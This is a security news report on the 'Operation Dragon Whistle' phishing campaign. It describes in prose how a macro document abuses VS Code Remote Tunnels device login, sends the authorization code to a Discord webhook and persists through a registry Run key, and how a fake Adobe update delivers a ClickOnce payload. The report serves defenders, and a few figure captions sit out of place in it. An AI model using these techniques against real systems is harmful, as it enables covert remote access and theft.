A recent phishing campaign dubbed “Operation Dragon Whistle” highlights an evolving trend in cyberattacks: threat actors abusing legitimate developer tools and cloud services to maintain stealth and persistence.
Although initially linked to targeting academic environments such as Changzhou University, new analysis reveals overlapping tactics used in a broader campaign aimed at government-linked organizations, including Pakistan’s Punjab Safe Cities Authority (PSCA) and PPIC3.
It references ongoing projects such as the Safe Jail initiative and includes technical terms like CAD designs and Automatic Number Plate Recognition systems. This level of detail suggests prior reconnaissance and increases the likelihood of user interaction.
The email contains two attachments designed to initiate separate infection chains while relying on the same attacker-controlled infrastructure hosted on a BunnyCDN domain.
The first attachment, a malicious Word document titled “CAD Reprot.doc,” contains embedded VBA macros. Once opened, the macro automatically executes and downloads an executable named code.exe into the system’s temporary directory.
Instead of deploying traditional malware, the attackers leverage Visual Studio Code’s command-line interface. The macro executes a command that initiates a Microsoft device authentication flow through VS Code Remote Tunnels.
This generates a device authorization code, which is typically used for secure login. However, in this campaign, the code is captured from the system output and exfiltrated to a Discord webhook controlled by the attacker.
According to Joe security, the attack begins with a carefully crafted spear-phishing email impersonating an internal consultant. Unlike typical phishing attempts that rely on urgency or fear, this message mimics routine internal communication.
This technique represents a shift from credential phishing to device enrollment. Rather than stealing usernames and passwords, the attacker uses the captured authorization code to authenticate their own Microsoft account on the victim’s machine.
This effectively links the compromised system to the attacker’s VS Code environment, allowing remote access through a legitimate Microsoft service.
Operation Dragon Whistle
Further analysis shows that persistence is achieved through a registry modification rather than a traditional Windows service.
The VS Code CLI generated a Microsoft device authorization code and prompted the user to visit the Microsoft device-login page.
A registry key is added under the current user’s run path, ensuring the VS Code tunnel is launched each time the user logs in. Once active, the tunnel enables full remote interaction, including terminal access and file operations, all within an encrypted and trusted communication channel.
The second attachment, “ANPR Reprot.pdf,” follows a different approach. It displays a fake Adobe Reader update prompt and redirects users to download a ClickOnce deployment file.
This file, disguised with Adobe branding, is designed to install a .NET-based payload. Although the final payload could not be recovered due to the server being blocked, analysis suggests it was intended to execute additional malicious components.
The use of ClickOnce is particularly notable because it exploits legacy enterprise environments where Internet Explorer or Edge compatibility modes are still in use.
The VS Code client and the “Remote – Tunnels” extension. After signing in with the test Microsoft account, we granted the extension permission to sign in using Microsoft.
These environments may automatically process such deployment manifests, increasing the likelihood of successful execution.
What makes this campaign significant is its reliance on legitimate tools such as Visual Studio Code and Discord rather than custom malware. By blending malicious activity with trusted services, attackers reduce detection and bypass many traditional security controls.
The campaign also demonstrates a clear shift toward living-off-the-land techniques, where built-in or widely trusted applications are weaponized.
This operation underscores the need for organizations to monitor not just suspicious files, but also unusual usage of legitimate tools.
Security teams should pay close attention to abnormal VS Code activity, unexpected device authentication flows, and outbound connections to platforms like Discord, as these may indicate compromise even in the absence of conventional malware.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
